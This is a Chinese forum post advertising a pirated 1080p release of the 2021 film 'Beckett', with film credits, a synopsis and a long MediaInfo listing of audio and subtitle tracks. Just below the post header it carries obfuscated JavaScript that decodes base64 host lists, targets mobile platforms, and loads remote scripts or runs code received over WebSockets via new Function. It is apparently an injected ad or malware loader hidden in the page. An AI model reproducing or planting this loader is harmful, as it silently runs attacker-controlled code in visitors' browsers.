厄运假期[简繁字幕].Beckett.2021.Netflix.WEB-DL.1080p.x264.DDP5.1 16.23GB

版主小s 1月前 147

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 厄运假期 / 凶险假期(港) / 贝克特 / 生而被杀 / 生来被谋杀 / Born to Be Murdered
◎片  名 Beckett
◎年  代 2021
◎产  地 意大利 / 巴西 / 希腊 / 美国
◎类  别 动作 / 惊悚 / 犯罪
◎语  言 英语
◎上映日期 2021-08-13(美国网络)
◎IMDb链接 https://www.imdb.com/title/tt10230994/
◎豆瓣链接 https://movie.douban.com/subject/33423672/
◎片  长 109分钟
◎导  演 费迪南多·西托·菲洛马里诺 Ferdinando Cito Filomarino (id:1387106)
◎编  剧 费迪南多·西托·菲洛马里诺 Ferdinando Cito Filomarino (id:1387106)
◎演  员 约翰·大卫·华盛顿 John David Washington (id:1023042)
       艾丽西亚·维坎德 Alicia Vikander (id:1233154)
       波伊德·霍布鲁克 Boyd Holbrook (id:1053504)
       薇姬·克里普斯 Vicky Krieps (id:1341743)
       约戈斯·皮尔帕索珀罗斯 Yorgos Pirpassopoulos (id:1141352)
       帕诺斯·科罗尼斯 Panos Koronis (id:1353514)
       卢卡·瓜达尼诺 Luca Guadagnino (id:1285579)
       坂本龙一 Ryuichi Sakamoto (id:1148641)

◎标  签 惊悚 / 2021 / 意大利 / 美国 / 坂本龙一 / 意大利电影 / 巴西 / 艾丽西亚·维坎德

◎简  介
  美籍游客贝克特在希腊发生严重车祸后,发现自己莫名身处一场危险政治阴谋的核心。为了保命,他被迫展开逃亡。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 109484130373724615170906451455788843688 (0x525DE0631A6D11E8671838E8BB3602A8)

  4. Complete name                            : [email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 16.2 GiB

  8. Duration                                 : 1 h 50 min

  9. Overall bit rate                         : 21.1 Mb/s

  10. Encoded date                             : UTC 2021-08-14 12:31:21

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 4 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 4 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 1 h 50 min

  23. Bit rate                                 : 10.8 Mb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 16:9

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 8 bits

  32. Scan type                                : Progressive

  33. Bits/(Pixel*Frame)                       : 0.218

  34. Stream size                              : 8.34 GiB (51%)

  35. Default                                  : Yes

  36. Forced                                   : No


  37. Audio #1

  38. ID                                       : 2

  39. Format                                   : E-AC-3

  40. Format/Info                              : Enhanced AC-3

  41. Commercial name                          : Dolby Digital Plus

  42. Codec ID                                 : A_EAC3

  43. Duration                                 : 1 h 50 min

  44. Bit rate mode                            : Constant

  45. Bit rate                                 : 640 kb/s

  46. Channel(s)                               : 6 channels

  47. Channel layout                           : L R C LFE Ls Rs

  48. Sampling rate                            : 48.0 kHz

  49. Frame rate                               : 31.250 FPS (1536 SPF)

  50. Compression mode                         : Lossy

  51. Delay relative to video                  : -83 ms

  52. Stream size                              : 504 MiB (3%)

  53. Language                                 : English

  54. Service kind                             : Complete Main

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Audio #2

  58. ID                                       : 3

  59. Format                                   : E-AC-3

  60. Format/Info                              : Enhanced AC-3

  61. Commercial name                          : Dolby Digital Plus

  62. Codec ID                                 : A_EAC3

  63. Duration                                 : 1 h 50 min

  64. Bit rate mode                            : Constant

  65. Bit rate                                 : 640 kb/s

  66. Channel(s)                               : 6 channels

  67. Channel layout                           : L R C LFE Ls Rs

  68. Sampling rate                            : 48.0 kHz

  69. Frame rate                               : 31.250 FPS (1536 SPF)

  70. Compression mode                         : Lossy

  71. Delay relative to video                  : -83 ms

  72. Stream size                              : 504 MiB (3%)

  73. Language                                 : German

  74. Service kind                             : Complete Main

  75. Default                                  : Yes

  76. Forced                                   : No


  77. Audio #3

  78. ID                                       : 4

  79. Format                                   : E-AC-3

  80. Format/Info                              : Enhanced AC-3

  81. Commercial name                          : Dolby Digital Plus

  82. Codec ID                                 : A_EAC3

  83. Duration                                 : 1 h 50 min

  84. Bit rate mode                            : Constant

  85. Bit rate                                 : 640 kb/s

  86. Channel(s)                               : 6 channels

  87. Channel layout                           : L R C LFE Ls Rs

  88. Sampling rate                            : 48.0 kHz

  89. Frame rate                               : 31.250 FPS (1536 SPF)

  90. Compression mode                         : Lossy

  91. Delay relative to video                  : -83 ms

  92. Stream size                              : 504 MiB (3%)

  93. Language                                 : French

  94. Service kind                             : Complete Main

  95. Default                                  : Yes

  96. Forced                                   : No


  97. Audio #4

  98. ID                                       : 5

  99. Format                                   : E-AC-3

  100. Format/Info                              : Enhanced AC-3

  101. Commercial name                          : Dolby Digital Plus

  102. Codec ID                                 : A_EAC3

  103. Duration                                 : 1 h 50 min

  104. Bit rate mode                            : Constant

  105. Bit rate                                 : 640 kb/s

  106. Channel(s)                               : 6 channels

  107. Channel layout                           : L R C LFE Ls Rs

  108. Sampling rate                            : 48.0 kHz

  109. Frame rate                               : 31.250 FPS (1536 SPF)

  110. Compression mode                         : Lossy

  111. Delay relative to video                  : -83 ms

  112. Stream size                              : 504 MiB (3%)

  113. Language                                 : Italian

  114. Service kind                             : Complete Main

  115. Default                                  : Yes

  116. Forced                                   : No


  117. Audio #5

  118. ID                                       : 6

  119. Format                                   : E-AC-3

  120. Format/Info                              : Enhanced AC-3

  121. Commercial name                          : Dolby Digital Plus

  122. Codec ID                                 : A_EAC3

  123. Duration                                 : 1 h 50 min

  124. Bit rate mode                            : Constant

  125. Bit rate                                 : 640 kb/s

  126. Channel(s)                               : 6 channels

  127. Channel layout                           : L R C LFE Ls Rs

  128. Sampling rate                            : 48.0 kHz

  129. Frame rate                               : 31.250 FPS (1536 SPF)

  130. Compression mode                         : Lossy

  131. Delay relative to video                  : -83 ms

  132. Stream size                              : 504 MiB (3%)

  133. Language                                 : Spanish

  134. Service kind                             : Complete Main

  135. Default                                  : Yes

  136. Forced                                   : No


  137. Audio #6

  138. ID                                       : 7

  139. Format                                   : E-AC-3

  140. Format/Info                              : Enhanced AC-3

  141. Commercial name                          : Dolby Digital Plus

  142. Codec ID                                 : A_EAC3

  143. Duration                                 : 1 h 50 min

  144. Bit rate mode                            : Constant

  145. Bit rate                                 : 640 kb/s

  146. Channel(s)                               : 6 channels

  147. Channel layout                           : L R C LFE Ls Rs

  148. Sampling rate                            : 48.0 kHz

  149. Frame rate                               : 31.250 FPS (1536 SPF)

  150. Compression mode                         : Lossy

  151. Delay relative to video                  : -83 ms

  152. Stream size                              : 504 MiB (3%)

  153. Language                                 : Swedish

  154. Service kind                             : Complete Main

  155. Default                                  : Yes

  156. Forced                                   : No


  157. Audio #7

  158. ID                                       : 8

  159. Format                                   : E-AC-3

  160. Format/Info                              : Enhanced AC-3

  161. Commercial name                          : Dolby Digital Plus

  162. Codec ID                                 : A_EAC3

  163. Duration                                 : 1 h 50 min

  164. Bit rate mode                            : Constant

  165. Bit rate                                 : 640 kb/s

  166. Channel(s)                               : 6 channels

  167. Channel layout                           : L R C LFE Ls Rs

  168. Sampling rate                            : 48.0 kHz

  169. Frame rate                               : 31.250 FPS (1536 SPF)

  170. Compression mode                         : Lossy

  171. Delay relative to video                  : -83 ms

  172. Stream size                              : 504 MiB (3%)

  173. Language                                 : Polish

  174. Service kind                             : Complete Main

  175. Default                                  : Yes

  176. Forced                                   : No


  177. Audio #8

  178. ID                                       : 9

  179. Format                                   : E-AC-3

  180. Format/Info                              : Enhanced AC-3

  181. Commercial name                          : Dolby Digital Plus

  182. Codec ID                                 : A_EAC3

  183. Duration                                 : 1 h 50 min

  184. Bit rate mode                            : Constant

  185. Bit rate                                 : 640 kb/s

  186. Channel(s)                               : 6 channels

  187. Channel layout                           : L R C LFE Ls Rs

  188. Sampling rate                            : 48.0 kHz

  189. Frame rate                               : 31.250 FPS (1536 SPF)

  190. Compression mode                         : Lossy

  191. Delay relative to video                  : -83 ms

  192. Stream size                              : 504 MiB (3%)

  193. Language                                 : Czech

  194. Service kind                             : Complete Main

  195. Default                                  : Yes

  196. Forced                                   : No


  197. Audio #9

  198. ID                                       : 10

  199. Format                                   : E-AC-3

  200. Format/Info                              : Enhanced AC-3

  201. Commercial name                          : Dolby Digital Plus

  202. Codec ID                                 : A_EAC3

  203. Duration                                 : 1 h 50 min

  204. Bit rate mode                            : Constant

  205. Bit rate                                 : 640 kb/s

  206. Channel(s)                               : 6 channels

  207. Channel layout                           : L R C LFE Ls Rs

  208. Sampling rate                            : 48.0 kHz

  209. Frame rate                               : 31.250 FPS (1536 SPF)

  210. Compression mode                         : Lossy

  211. Delay relative to video                  : -83 ms

  212. Stream size                              : 504 MiB (3%)

  213. Language                                 : Russian

  214. Service kind                             : Complete Main

  215. Default                                  : Yes

  216. Forced                                   : No


  217. Audio #10

  218. ID                                       : 11

  219. Format                                   : E-AC-3

  220. Format/Info                              : Enhanced AC-3

  221. Commercial name                          : Dolby Digital Plus

  222. Codec ID                                 : A_EAC3

  223. Duration                                 : 1 h 50 min

  224. Bit rate mode                            : Constant

  225. Bit rate                                 : 640 kb/s

  226. Channel(s)                               : 6 channels

  227. Channel layout                           : L R C LFE Ls Rs

  228. Sampling rate                            : 48.0 kHz

  229. Frame rate                               : 31.250 FPS (1536 SPF)

  230. Compression mode                         : Lossy

  231. Delay relative to video                  : -83 ms

  232. Stream size                              : 504 MiB (3%)

  233. Language                                 : Hungarian

  234. Service kind                             : Complete Main

  235. Default                                  : Yes

  236. Forced                                   : No


  237. Audio #11

  238. ID                                       : 12

  239. Format                                   : E-AC-3

  240. Format/Info                              : Enhanced AC-3

  241. Commercial name                          : Dolby Digital Plus

  242. Codec ID                                 : A_EAC3

  243. Duration                                 : 1 h 50 min

  244. Bit rate mode                            : Constant

  245. Bit rate                                 : 640 kb/s

  246. Channel(s)                               : 6 channels

  247. Channel layout                           : L R C LFE Ls Rs

  248. Sampling rate                            : 48.0 kHz

  249. Frame rate                               : 31.250 FPS (1536 SPF)

  250. Compression mode                         : Lossy

  251. Delay relative to video                  : -83 ms

  252. Stream size                              : 504 MiB (3%)

  253. Language                                 : Portuguese

  254. Service kind                             : Complete Main

  255. Default                                  : Yes

  256. Forced                                   : No


  257. Audio #12

  258. ID                                       : 13

  259. Format                                   : E-AC-3

  260. Format/Info                              : Enhanced AC-3

  261. Commercial name                          : Dolby Digital Plus

  262. Codec ID                                 : A_EAC3

  263. Duration                                 : 1 h 50 min

  264. Bit rate mode                            : Constant

  265. Bit rate                                 : 640 kb/s

  266. Channel(s)                               : 6 channels

  267. Channel layout                           : L R C LFE Ls Rs

  268. Sampling rate                            : 48.0 kHz

  269. Frame rate                               : 31.250 FPS (1536 SPF)

  270. Compression mode                         : Lossy

  271. Delay relative to video                  : -83 ms

  272. Stream size                              : 504 MiB (3%)

  273. Language                                 : Turkish

  274. Service kind                             : Complete Main

  275. Default                                  : Yes

  276. Forced                                   : No


  277. Audio #13

  278. ID                                       : 14

  279. Format                                   : E-AC-3

  280. Format/Info                              : Enhanced AC-3

  281. Commercial name                          : Dolby Digital Plus

  282. Codec ID                                 : A_EAC3

  283. Duration                                 : 1 h 50 min

  284. Bit rate mode                            : Constant

  285. Bit rate                                 : 640 kb/s

  286. Channel(s)                               : 6 channels

  287. Channel layout                           : L R C LFE Ls Rs

  288. Sampling rate                            : 48.0 kHz

  289. Frame rate                               : 31.250 FPS (1536 SPF)

  290. Compression mode                         : Lossy

  291. Delay relative to video                  : -83 ms

  292. Stream size                              : 504 MiB (3%)

  293. Language                                 : Arabic

  294. Service kind                             : Complete Main

  295. Default                                  : Yes

  296. Forced                                   : No


  297. Audio #14

  298. ID                                       : 15

  299. Format                                   : E-AC-3

  300. Format/Info                              : Enhanced AC-3

  301. Commercial name                          : Dolby Digital Plus

  302. Codec ID                                 : A_EAC3

  303. Duration                                 : 1 h 50 min

  304. Bit rate mode                            : Constant

  305. Bit rate                                 : 640 kb/s

  306. Channel(s)                               : 6 channels

  307. Channel layout                           : L R C LFE Ls Rs

  308. Sampling rate                            : 48.0 kHz

  309. Frame rate                               : 31.250 FPS (1536 SPF)

  310. Compression mode                         : Lossy

  311. Delay relative to video                  : -83 ms

  312. Stream size                              : 504 MiB (3%)

  313. Language                                 : Japanese

  314. Service kind                             : Complete Main

  315. Default                                  : Yes

  316. Forced                                   : No


  317. Audio #15

  318. ID                                       : 16

  319. Format                                   : E-AC-3

  320. Format/Info                              : Enhanced AC-3

  321. Commercial name                          : Dolby Digital Plus

  322. Codec ID                                 : A_EAC3

  323. Duration                                 : 1 h 50 min

  324. Bit rate mode                            : Constant

  325. Bit rate                                 : 640 kb/s

  326. Channel(s)                               : 6 channels

  327. Channel layout                           : L R C LFE Ls Rs

  328. Sampling rate                            : 48.0 kHz

  329. Frame rate                               : 31.250 FPS (1536 SPF)

  330. Compression mode                         : Lossy

  331. Delay relative to video                  : -83 ms

  332. Stream size                              : 504 MiB (3%)

  333. Language                                 : Thai

  334. Service kind                             : Complete Main

  335. Default                                  : Yes

  336. Forced                                   : No


  337. Audio #16

  338. ID                                       : 17

  339. Format                                   : E-AC-3

  340. Format/Info                              : Enhanced AC-3

  341. Commercial name                          : Dolby Digital Plus

  342. Codec ID                                 : A_EAC3

  343. Duration                                 : 1 h 50 min

  344. Bit rate mode                            : Constant

  345. Bit rate                                 : 640 kb/s

  346. Channel(s)                               : 6 channels

  347. Channel layout                           : L R C LFE Ls Rs

  348. Sampling rate                            : 48.0 kHz

  349. Frame rate                               : 31.250 FPS (1536 SPF)

  350. Compression mode                         : Lossy

  351. Delay relative to video                  : -83 ms

  352. Stream size                              : 504 MiB (3%)

  353. Language                                 : Hindi

  354. Service kind                             : Complete Main

  355. Default                                  : Yes

  356. Forced                                   : No


  357. Text #1

  358. ID                                       : 18

  359. Format                                   : UTF-8

  360. Codec ID                                 : S_TEXT/UTF8

  361. Codec ID/Info                            : UTF-8 Plain Text

  362. Duration                                 : 1 h 47 min

  363. Bit rate                                 : 48 b/s

  364. Count of elements                        : 734

  365. Stream size                              : 38.2 KiB (0%)

  366. Title                                    : ???????

  367. Language                                 : Arabic

  368. Default                                  : Yes

  369. Forced                                   : No


  370. Text #2

  371. ID                                       : 19

  372. Format                                   : UTF-8

  373. Codec ID                                 : S_TEXT/UTF8

  374. Codec ID/Info                            : UTF-8 Plain Text

  375. Duration                                 : 1 h 47 min

  376. Bit rate                                 : 25 b/s

  377. Count of elements                        : 733

  378. Stream size                              : 19.9 KiB (0%)

  379. Title                                    : ?e?tina

  380. Language                                 : Czech

  381. Default                                  : Yes

  382. Forced                                   : No


  383. Text #3

  384. ID                                       : 20

  385. Format                                   : UTF-8

  386. Codec ID                                 : S_TEXT/UTF8

  387. Codec ID/Info                            : UTF-8 Plain Text

  388. Duration                                 : 1 h 47 min

  389. Bit rate                                 : 26 b/s

  390. Count of elements                        : 708

  391. Stream size                              : 21.0 KiB (0%)

  392. Title                                    : Dansk

  393. Language                                 : Danish

  394. Default                                  : Yes

  395. Forced                                   : No


  396. Text #4

  397. ID                                       : 21

  398. Format                                   : UTF-8

  399. Codec ID                                 : S_TEXT/UTF8

  400. Codec ID/Info                            : UTF-8 Plain Text

  401. Duration                                 : 1 h 47 min

  402. Bit rate                                 : 26 b/s

  403. Count of elements                        : 731

  404. Stream size                              : 20.8 KiB (0%)

  405. Title                                    : Deutsch

  406. Language                                 : German

  407. Default                                  : Yes

  408. Forced                                   : No


  409. Text #5

  410. ID                                       : 22

  411. Format                                   : UTF-8

  412. Codec ID                                 : S_TEXT/UTF8

  413. Codec ID/Info                            : UTF-8 Plain Text

  414. Duration                                 : 1 h 47 min

  415. Bit rate                                 : 45 b/s

  416. Count of elements                        : 808

  417. Stream size                              : 36.1 KiB (0%)

  418. Title                                    : Ελληνικ?

  419. Language                                 : Greek

  420. Default                                  : Yes

  421. Forced                                   : No


  422. Text #6

  423. ID                                       : 23

  424. Format                                   : UTF-8

  425. Codec ID                                 : S_TEXT/UTF8

  426. Codec ID/Info                            : UTF-8 Plain Text

  427. Duration                                 : 1 h 46 min

  428. Bit rate                                 : 50 b/s

  429. Count of elements                        : 1338

  430. Stream size                              : 39.3 KiB (0%)

  431. Title                                    : English

  432. Language                                 : English

  433. Default                                  : Yes

  434. Forced                                   : No


  435. Text #7

  436. ID                                       : 24

  437. Format                                   : UTF-8

  438. Codec ID                                 : S_TEXT/UTF8

  439. Codec ID/Info                            : UTF-8 Plain Text

  440. Duration                                 : 1 h 47 min

  441. Bit rate                                 : 27 b/s

  442. Count of elements                        : 738

  443. Stream size                              : 21.7 KiB (0%)

  444. Title                                    : Espa?ol

  445. Language                                 : Spanish

  446. Default                                  : Yes

  447. Forced                                   : No


  448. Text #8

  449. ID                                       : 25

  450. Format                                   : UTF-8

  451. Codec ID                                 : S_TEXT/UTF8

  452. Codec ID/Info                            : UTF-8 Plain Text

  453. Duration                                 : 1 h 47 min

  454. Bit rate                                 : 26 b/s

  455. Count of elements                        : 727

  456. Stream size                              : 21.2 KiB (0%)

  457. Title                                    : Europa?Espa?ol

  458. Language                                 : Spanish

  459. Default                                  : Yes

  460. Forced                                   : No


  461. Text #9

  462. ID                                       : 26

  463. Format                                   : UTF-8

  464. Codec ID                                 : S_TEXT/UTF8

  465. Codec ID/Info                            : UTF-8 Plain Text

  466. Duration                                 : 1 h 47 min

  467. Bit rate                                 : 25 b/s

  468. Count of elements                        : 703

  469. Stream size                              : 19.7 KiB (0%)

  470. Title                                    : Suomi

  471. Language                                 : Finnish

  472. Default                                  : Yes

  473. Forced                                   : No


  474. Text #10

  475. ID                                       : 27

  476. Format                                   : UTF-8

  477. Codec ID                                 : S_TEXT/UTF8

  478. Codec ID/Info                            : UTF-8 Plain Text

  479. Duration                                 : 1 h 47 min

  480. Bit rate                                 : 28 b/s

  481. Count of elements                        : 725

  482. Stream size                              : 22.2 KiB (0%)

  483. Title                                    : Fran?ais

  484. Language                                 : French

  485. Default                                  : Yes

  486. Forced                                   : No


  487. Text #11

  488. ID                                       : 28

  489. Format                                   : UTF-8

  490. Codec ID                                 : S_TEXT/UTF8

  491. Codec ID/Info                            : UTF-8 Plain Text

  492. Duration                                 : 1 h 47 min

  493. Bit rate                                 : 43 b/s

  494. Count of elements                        : 734

  495. Stream size                              : 34.5 KiB (0%)

  496. Title                                    : ?????

  497. Language                                 : Hebrew

  498. Default                                  : Yes

  499. Forced                                   : No


  500. Text #12

  501. ID                                       : 29

  502. Format                                   : UTF-8

  503. Codec ID                                 : S_TEXT/UTF8

  504. Codec ID/Info                            : UTF-8 Plain Text

  505. Duration                                 : 1 h 47 min

  506. Bit rate                                 : 25 b/s

  507. Count of elements                        : 724

  508. Stream size                              : 20.1 KiB (0%)

  509. Title                                    : Hrvatski

  510. Language                                 : Croatian

  511. Default                                  : Yes

  512. Forced                                   : No


  513. Text #13

  514. ID                                       : 30

  515. Format                                   : UTF-8

  516. Codec ID                                 : S_TEXT/UTF8

  517. Codec ID/Info                            : UTF-8 Plain Text

  518. Duration                                 : 1 h 47 min

  519. Bit rate                                 : 26 b/s

  520. Count of elements                        : 723

  521. Stream size                              : 21.0 KiB (0%)

  522. Title                                    : Magyar

  523. Language                                 : Hungarian

  524. Default                                  : Yes

  525. Forced                                   : No


  526. Text #14

  527. ID                                       : 31

  528. Format                                   : UTF-8

  529. Codec ID                                 : S_TEXT/UTF8

  530. Codec ID/Info                            : UTF-8 Plain Text

  531. Duration                                 : 1 h 47 min

  532. Bit rate                                 : 27 b/s

  533. Count of elements                        : 733

  534. Stream size                              : 21.8 KiB (0%)

  535. Title                                    : Indonesian

  536. Language                                 : Indonesian

  537. Default                                  : Yes

  538. Forced                                   : No


  539. Text #15

  540. ID                                       : 32

  541. Format                                   : UTF-8

  542. Codec ID                                 : S_TEXT/UTF8

  543. Codec ID/Info                            : UTF-8 Plain Text

  544. Duration                                 : 1 h 47 min

  545. Bit rate                                 : 27 b/s

  546. Count of elements                        : 751

  547. Stream size                              : 21.3 KiB (0%)

  548. Title                                    : Italian

  549. Language                                 : Italian

  550. Default                                  : Yes

  551. Forced                                   : No


  552. Text #16

  553. ID                                       : 33

  554. Format                                   : UTF-8

  555. Codec ID                                 : S_TEXT/UTF8

  556. Codec ID/Info                            : UTF-8 Plain Text

  557. Duration                                 : 1 h 47 min

  558. Bit rate                                 : 50 b/s

  559. Count of elements                        : 818

  560. Stream size                              : 39.6 KiB (0%)

  561. Title                                    : 日本語

  562. Language                                 : Japanese

  563. Default                                  : Yes

  564. Forced                                   : No


  565. Text #17

  566. ID                                       : 34

  567. Format                                   : UTF-8

  568. Codec ID                                 : S_TEXT/UTF8

  569. Codec ID/Info                            : UTF-8 Plain Text

  570. Duration                                 : 1 h 47 min

  571. Bit rate                                 : 32 b/s

  572. Count of elements                        : 800

  573. Stream size                              : 25.8 KiB (0%)

  574. Title                                    : ??

  575. Language                                 : Korean

  576. Default                                  : Yes

  577. Forced                                   : No


  578. Text #18

  579. ID                                       : 35

  580. Format                                   : UTF-8

  581. Codec ID                                 : S_TEXT/UTF8

  582. Codec ID/Info                            : UTF-8 Plain Text

  583. Duration                                 : 1 h 47 min

  584. Bit rate                                 : 27 b/s

  585. Count of elements                        : 731

  586. Stream size                              : 21.8 KiB (0%)

  587. Title                                    : Malaysia

  588. Language                                 : Malay

  589. Default                                  : Yes

  590. Forced                                   : No


  591. Text #19

  592. ID                                       : 36

  593. Format                                   : UTF-8

  594. Codec ID                                 : S_TEXT/UTF8

  595. Codec ID/Info                            : UTF-8 Plain Text

  596. Duration                                 : 1 h 47 min

  597. Bit rate                                 : 26 b/s

  598. Count of elements                        : 703

  599. Stream size                              : 21.2 KiB (0%)

  600. Title                                    : Norsk?Bokm?l

  601. Language                                 : Norwegian Bokmal

  602. Default                                  : Yes

  603. Forced                                   : No


  604. Text #20

  605. ID                                       : 37

  606. Format                                   : UTF-8

  607. Codec ID                                 : S_TEXT/UTF8

  608. Codec ID/Info                            : UTF-8 Plain Text

  609. Duration                                 : 1 h 47 min

  610. Bit rate                                 : 24 b/s

  611. Count of elements                        : 631

  612. Stream size                              : 19.0 KiB (0%)

  613. Title                                    : Nederlands

  614. Language                                 : Dutch

  615. Default                                  : Yes

  616. Forced                                   : No


  617. Text #21

  618. ID                                       : 38

  619. Format                                   : UTF-8

  620. Codec ID                                 : S_TEXT/UTF8

  621. Codec ID/Info                            : UTF-8 Plain Text

  622. Duration                                 : 1 h 47 min

  623. Bit rate                                 : 25 b/s

  624. Count of elements                        : 727

  625. Stream size                              : 20.0 KiB (0%)

  626. Title                                    : Polski

  627. Language                                 : Polish

  628. Default                                  : Yes

  629. Forced                                   : No


  630. Text #22

  631. ID                                       : 39

  632. Format                                   : UTF-8

  633. Codec ID                                 : S_TEXT/UTF8

  634. Codec ID/Info                            : UTF-8 Plain Text

  635. Duration                                 : 1 h 47 min

  636. Bit rate                                 : 27 b/s

  637. Count of elements                        : 730

  638. Stream size                              : 21.4 KiB (0%)

  639. Title                                    : Português

  640. Language                                 : Portuguese

  641. Default                                  : Yes

  642. Forced                                   : No


  643. Text #23

  644. ID                                       : 40

  645. Format                                   : UTF-8

  646. Codec ID                                 : S_TEXT/UTF8

  647. Codec ID/Info                            : UTF-8 Plain Text

  648. Duration                                 : 1 h 47 min

  649. Bit rate                                 : 26 b/s

  650. Count of elements                        : 728

  651. Stream size                              : 20.6 KiB (0%)

  652. Title                                    : Brasileiro?Português

  653. Language                                 : Portuguese

  654. Default                                  : Yes

  655. Forced                                   : No


  656. Text #24

  657. ID                                       : 41

  658. Format                                   : UTF-8

  659. Codec ID                                 : S_TEXT/UTF8

  660. Codec ID/Info                            : UTF-8 Plain Text

  661. Duration                                 : 1 h 47 min

  662. Bit rate                                 : 28 b/s

  663. Count of elements                        : 730

  664. Stream size                              : 22.1 KiB (0%)

  665. Title                                    : Roman?

  666. Language                                 : Romanian

  667. Default                                  : Yes

  668. Forced                                   : No


  669. Text #25

  670. ID                                       : 42

  671. Format                                   : UTF-8

  672. Codec ID                                 : S_TEXT/UTF8

  673. Codec ID/Info                            : UTF-8 Plain Text

  674. Duration                                 : 1 h 47 min

  675. Bit rate                                 : 46 b/s

  676. Count of elements                        : 734

  677. Stream size                              : 36.7 KiB (0%)

  678. Title                                    : русский?язык

  679. Language                                 : Russian

  680. Default                                  : Yes

  681. Forced                                   : No


  682. Text #26

  683. ID                                       : 43

  684. Format                                   : UTF-8

  685. Codec ID                                 : S_TEXT/UTF8

  686. Codec ID/Info                            : UTF-8 Plain Text

  687. Duration                                 : 1 h 47 min

  688. Bit rate                                 : 27 b/s

  689. Count of elements                        : 691

  690. Stream size                              : 21.7 KiB (0%)

  691. Title                                    : Svenska

  692. Language                                 : Swedish

  693. Default                                  : Yes

  694. Forced                                   : No


  695. Text #27

  696. ID                                       : 44

  697. Format                                   : UTF-8

  698. Codec ID                                 : S_TEXT/UTF8

  699. Codec ID/Info                            : UTF-8 Plain Text

  700. Duration                                 : 1 h 47 min

  701. Bit rate                                 : 68 b/s

  702. Count of elements                        : 735

  703. Stream size                              : 54.4 KiB (0%)

  704. Title                                    : ???

  705. Language                                 : Thai

  706. Default                                  : Yes

  707. Forced                                   : No


  708. Text #28

  709. ID                                       : 45

  710. Format                                   : UTF-8

  711. Codec ID                                 : S_TEXT/UTF8

  712. Codec ID/Info                            : UTF-8 Plain Text

  713. Duration                                 : 1 h 47 min

  714. Bit rate                                 : 27 b/s

  715. Count of elements                        : 733

  716. Stream size                              : 21.7 KiB (0%)

  717. Title                                    : Türk?e

  718. Language                                 : Turkish

  719. Default                                  : Yes

  720. Forced                                   : No


  721. Text #29

  722. ID                                       : 46

  723. Format                                   : UTF-8

  724. Codec ID                                 : S_TEXT/UTF8

  725. Codec ID/Info                            : UTF-8 Plain Text

  726. Duration                                 : 1 h 47 min

  727. Bit rate                                 : 43 b/s

  728. Count of elements                        : 732

  729. Stream size                              : 34.6 KiB (0%)

  730. Title                                    : Укра?нська

  731. Language                                 : Ukrainian

  732. Default                                  : Yes

  733. Forced                                   : No


  734. Text #30

  735. ID                                       : 47

  736. Format                                   : UTF-8

  737. Codec ID                                 : S_TEXT/UTF8

  738. Codec ID/Info                            : UTF-8 Plain Text

  739. Duration                                 : 1 h 47 min

  740. Bit rate                                 : 35 b/s

  741. Count of elements                        : 744

  742. Stream size                              : 28.2 KiB (0%)

  743. Title                                    : Ti?ng?Vi?t

  744. Language                                 : Vietnamese

  745. Default                                  : Yes

  746. Forced                                   : No


  747. Text #31

  748. ID                                       : 48

  749. Format                                   : UTF-8

  750. Codec ID                                 : S_TEXT/UTF8

  751. Codec ID/Info                            : UTF-8 Plain Text

  752. Duration                                 : 1 h 47 min

  753. Bit rate                                 : 25 b/s

  754. Count of elements                        : 733

  755. Stream size                              : 20.4 KiB (0%)

  756. Title                                    : 中文(简体)

  757. Language                                 : Chinese

  758. Default                                  : Yes

  759. Forced                                   : No


  760. Text #32

  761. ID                                       : 49

  762. Format                                   : UTF-8

  763. Codec ID                                 : S_TEXT/UTF8

  764. Codec ID/Info                            : UTF-8 Plain Text

  765. Duration                                 : 1 h 47 min

  766. Bit rate                                 : 25 b/s

  767. Count of elements                        : 737

  768. Stream size                              : 20.0 KiB (0%)

  769. Title                                    : 中文(繁體)

  770. Language                                 : Chinese

  771. Default                                  : Yes

  772. Forced                                   : No



TAGS 动作 惊悚 犯罪

